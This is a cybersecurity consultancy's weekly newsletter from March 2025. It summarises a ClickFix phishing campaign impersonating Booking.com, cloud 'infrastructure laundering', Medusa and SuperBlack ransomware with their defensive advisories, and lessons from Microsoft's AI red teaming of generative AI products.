Intelligence
Cyber Intelligence Weekly Echelon

Cyber Intelligence Weekly (March 16, 2025): Our Take on Three Things You Need to Know

By
Posted on Mar 16 / 2025

Welcome to our weekly newsletter where we share some of the major developments on the future of cybersecurity that you need to know about. Make sure to follow my LinkedIn page as well as Echelon’s LinkedIn page to receive updates on the future of cybersecurity!

To receive these and other curated updates to your inbox on a regular basis, please sign up for our email list here: https://echeloncyber.com/ciw-subscribe

Before we get started on this week’s CIW, I’d like to highlight an article we authored on the DeepSeek AI Model.

The Security Paradox – Flaws in DeepSeek Expose Industry-Wide AI Safety Challenges Cybersecurity experts Emmanuel Petrov and Alex Watts take a deep dive into the risks of DeepSeek R1, uncovering serious security flaws that could put businesses at risk. From open databases to model jailbreaks and data privacy concerns, this AI model presents vulnerabilities that can’t be ignored. Get the full breakdown on what these risks mean and how organizations can stay ahead.

Get the full details here: https://lnkd.in/ejet95pM

Away we go!

1. Cybercriminals Impersonate Booking.com in Phishing Scam Targeting the Hospitality Industry

A new phishing campaign is targeting hotels and hospitality workers by impersonating Booking.com in an attempt to steal credentials and financial data. The scam, which has been active since December 2024, has affected businesses across North America, Europe, and Southeast Asia. Cybercriminals use a social engineering technique called "ClickFix" to trick victims into manually running malicious commands that install credential-stealing malware on their systems. Microsoft researchers identified the attackers as Storm-1865, a cybercriminal group known for financial fraud and phishing operations.

Victims typically receive an email disguised as an important message from Booking.com, referencing issues like negative guest reviews, account verification, or urgent requests from potential customers. Once clicked, the link takes the recipient to a fake CAPTCHA page, where the user is instructed to copy and paste a command that ultimately downloads malware onto their device. The malicious software includes XWorm, Lumma Stealer, VenomRAT, and AsyncRAT, all designed to steal login credentials and financial information.

While Booking.com has confirmed that its own systems were not breached, the company acknowledges that some of its partners and customers have been impacted. Microsoft has urged hospitality workers to be vigilant by verifying sender email addresses, avoiding urgent requests for action, and hovering over links to check their authenticity. As cybercriminals continue to refine their tactics, businesses in the hospitality industry must adopt strong cybersecurity practices to protect their systems and customers from ongoing threats.

Cloud “Infrastructure Laundering” Discovered

In early February 2025, cybersecurity researchers uncovered a sophisticated scheme termed "infrastructure laundering," wherein threat actors exploit reputable cloud service providers like Amazon Web Services (AWS) and Microsoft Azure to host malicious activities. This method involves the rapid acquisition and disposal of IP addresses from these platforms, enabling cybercriminals to mask their operations and evade detection.

The Emergence of Infrastructure Laundering

The term "infrastructure laundering" was introduced by researchers at Silent Push, who identified this tactic while investigating the extensive use of AWS and Azure services by threat actors. Their research led them to the Funnull content delivery network (CDN), a China-based entity previously associated with malicious activities. Funnull was found to be renting IP addresses from these cloud providers and mapping them to fraudulent websites. By continuously cycling through cloud resources—acquiring new IPs and discarding them before detection—Funnull effectively obscured its malicious infrastructure within legitimate cloud environments.

Scope of Exploitation

Silent Push's analysis revealed that Funnull had rented over 1,200 IP addresses from AWS and nearly 200 from Microsoft Azure. Although many of these IPs have been decommissioned, Funnull's strategy involves persistently obtaining new addresses every few weeks. This rapid turnover hampers defenders' efforts to identify and block malicious activities promptly. The blending of malicious operations with legitimate web traffic further complicates detection and mitigation, as indiscriminate blocking could disrupt services for genuine users.

Implications for Cloud Security

The exploitation of mainstream cloud services for malicious purposes presents significant challenges for cybersecurity. Cloud providers like AWS and Microsoft Azure are integral to the infrastructure of countless organizations worldwide. Threat actors leveraging these platforms can exploit the inherent trust associated with their IP addresses, making it difficult for security systems to distinguish between legitimate and malicious traffic. This tactic not only undermines the reputation of these cloud services but also poses risks to their clients, who may inadvertently interact with or be targeted by malicious entities operating under the guise of trusted infrastructure.

Challenges in Mitigation

Addressing infrastructure laundering requires a nuanced approach. Cloud service providers must balance the need for stringent security measures with the imperative to maintain seamless service for legitimate users. Implementing overly aggressive blocking or takedown policies could lead to collateral damage, affecting innocent parties who share IP address spaces or rely on the same services. Moreover, the dynamic nature of IP allocation and the sheer scale of cloud infrastructures make real-time monitoring and response a formidable task.

Recommendations for Strengthening Cloud Security

To combat infrastructure laundering and similar threats, a collaborative effort between cloud service providers, security researchers, and end-users is essential. The following measures can enhance the security posture against such exploits:

  1. Enhanced Monitoring and Analytics: Cloud providers should implement advanced monitoring tools capable of detecting anomalous patterns indicative of malicious activities. Machine learning algorithms can analyze traffic behaviors to identify and flag suspicious operations.
  2. Stricter Verification Processes: Implementing rigorous vetting procedures for entities renting IP addresses can help deter malicious actors. This may include thorough background checks and continuous monitoring of clients' activities.
  3. Collaborative Threat Intelligence Sharing: Establishing channels for real-time information exchange between cloud providers, cybersecurity firms, and law enforcement agencies can facilitate swift identification and mitigation of threats.
  4. User Education and Awareness: Organizations utilizing cloud services should be educated about potential risks and best practices for securing their environments. This includes regular training on recognizing and responding to suspicious activities.
  5. Development of Advanced Filtering Techniques: Investing in research to create filtering mechanisms that can accurately distinguish between legitimate and malicious traffic will reduce the risk of collateral damage during mitigation efforts.

The phenomenon of infrastructure laundering exemplifies the evolving tactics of cybercriminals in leveraging trusted platforms to conduct illicit activities. As threat actors continue to adapt, it is imperative for the cybersecurity community to develop innovative strategies and foster collaboration to safeguard the integrity of cloud infrastructures. Proactive measures, informed by ongoing research and shared intelligence, are crucial in staying ahead of such sophisticated threats.

 

2.  Medusa Ransomware Strikes Over 300 Critical Infrastructure Organizations in the U.S.

A new advisory from the Cybersecurity and Infrastructure Security Agency (CISA), in collaboration with the FBI and MS-ISAC, warns that the Medusa ransomware operation has affected over 300 critical infrastructure organizations across the United States. Since February 2025, industries such as healthcare, education, technology, manufacturing, and legal services have reported being impacted by this growing cyber threat. Authorities emphasize that Medusa’s developers and affiliates have been actively targeting vulnerable systems, demanding large ransoms and threatening data leaks to coerce victims into paying.

The Medusa ransomware group, which first surfaced in 2021, has evolved into a ransomware-as-a-service (RaaS) operation, where cybercriminal affiliates purchase access to deploy attacks on targeted networks. The attackers primarily gain access through initial access brokers, phishing campaigns, and exploitation of unpatched security vulnerabilities. Notably, the Medusa Blog on the dark web serves as a platform where hackers publicly leak stolen data from organizations that refuse to pay ransom demands. Victims of past attacks include Minneapolis Public Schools and Toyota Financial Services, with ransom demands reaching up to $8 million.

Medusa ransomware attacks have increased by 42% year-over-year, with nearly double the attacks observed in early 2025 compared to the same period in 2024. In response, CISA and the FBI recommend immediate security measures, including patching known vulnerabilities, segmenting networks, filtering traffic from untrusted sources, and enforcing multi-factor authentication. As cybercriminals continue refining their tactics, organizations must take proactive cybersecurity measures to defend against the escalating threat of Medusa ransomware.

 

Red Teaming 100 GenAI Products: Lessons from Microsoft’s AI Red Team

OMicrosoft’s AI Red Team recently published key findings from red teaming over 100 generative AI (GenAI) products, including applications, features, copilots, plugins, and models, offering critical insights for security practitioners and AI safety leaders. Their comprehensive white paper introduces a novel threat model ontology that combines canonical security frameworks like MITRE ATT&CK with emerging AI-specific attack vectors to provide a cohesive approach to analyzing both security risks and responsible AI gaps.

Main takeaways from the research include:

  • AI systems amplify traditional security risks while introducing new attack vectors. Organizations should maintain robust security hygiene while developing AI-specific security capabilities.
  • Human expertise remains irreplaceable in AI security testing, especially for evaluating complex scenarios involving subject matter expertise, cultural nuances, and psychosocial impacts.
  • Effective AI security requires a defense-in-depth approach combining continuous red teaming, best-practice security controls, and AI-specific safeguards in iterative “break-fix cycles”.

The research underscores a crucial reality: GenAI systems do not just introduce new attack surfaces—they amplify existing security risks. The team’s findings reveal what while prompt injections and model evasion techniques remain prominent exploits, traditional vulnerabilities like Server-Side Request Forgery (SSRF) remain equally compromising to AI systems. The diagram below shows how the well-known SSRF vulnerability can be exploited in a GenAI system. This dual threat landscape requires security teams to evolve their assessment methodologies while maintaining rigorous coverage of fundamental security practices.

 

Figure 1: Process Flow of SSRF Vulnerability in GenAI Application

Most notably, the research challenges the notion that AI security can be fully automated. Although the Microsoft team leveraged sophisticated automation tools like PyRIT (i.e., their open-source Python Risk Identification Toolkit), they found that human expertise is irreplaceable for evaluating content risks, contextual harms, and human-AI interactions. This human expertise spans subject matter knowledge, cultural competence, and emotional intelligence. Their case studies demonstrate how technical vulnerabilities often intersect with nuanced psychosocial and cultural factors that automated tools currently cannot meaningfully assess.

The team’s findings highlight a defense-in-depth strategy that combines traditional security hardening, AI-specific safeguards, and continuous red teaming that adjusts to novel harms in a “break-fix cycle”, also known as purple-teaming. This research provides both a strategic framework and tactical guidance for securing AI systems, highlighting the importance of cross-functional expertise in robust AI security programs. Fo detailed case studies and technical recommendations on developing AI security strategies, reference the full report.
 

 

3.  SuperBlack Ransomware Exploits Fortinet Flaws to Breach Critical Systems

A newly identified ransomware group, operating under the alias Mora_001, has been leveraging vulnerabilities in Fortinet firewalls to infiltrate systems and deploy its custom ransomware strain, SuperBlack. The attackers exploit two authentication bypass vulnerabilities, CVE-2024-55591 and CVE-2025-24472, which were disclosed by Fortinet in early 2025. These security flaws allow unauthorized access to FortiGate firewall appliances, enabling attackers to escalate privileges and establish persistent access for deploying ransomware payloads.

According to researchers, the attack methodology remains consistent across victims. The group first gains super administrator privileges through WebSocket-based exploits or direct HTTPS requests targeting vulnerable firewall interfaces. Once inside, they create unauthorized admin accounts, manipulate automation settings to maintain access, and expand their foothold using VPN credentials, SSH, and Windows Management Instrumentation (WMIC). The attackers then exfiltrate sensitive data before launching the encryption process as part of their double extortion strategy, demanding ransoms in exchange for decryption keys and to prevent data leaks.

Further analysis suggests a possible connection between SuperBlack and the notorious LockBit ransomware operation. Researchers noted similarities in encryption methods, overlapping infrastructure, and ransom note identifiers tied to LockBit affiliates. However, SuperBlack appears to function independently while adopting LockBit’s techniques, making it a significant threat to enterprises relying on Fortinet security appliances.

We strongly advise organizations to immediately patch vulnerable Fortinet devices, restrict public access to firewall management interfaces, and implement multi-factor authentication (MFA) to prevent unauthorized access. Given the rapid escalation of SuperBlack ransomware attacks, cybersecurity teams must actively monitor for indicators of compromise (IoCs) and strengthen their incident response capabilities to mitigate the growing risk.

 

Thanks for reading!

About us: Echelon is a full-service cybersecurity consultancy that offers wholistic cybersecurity program building through vCISO or more specific solutions like penetration testing, red teaming, security engineering, cybersecurity compliance, and much more! Learn more about Echelon here: https://echeloncyber.com/about

Are you ready to get started?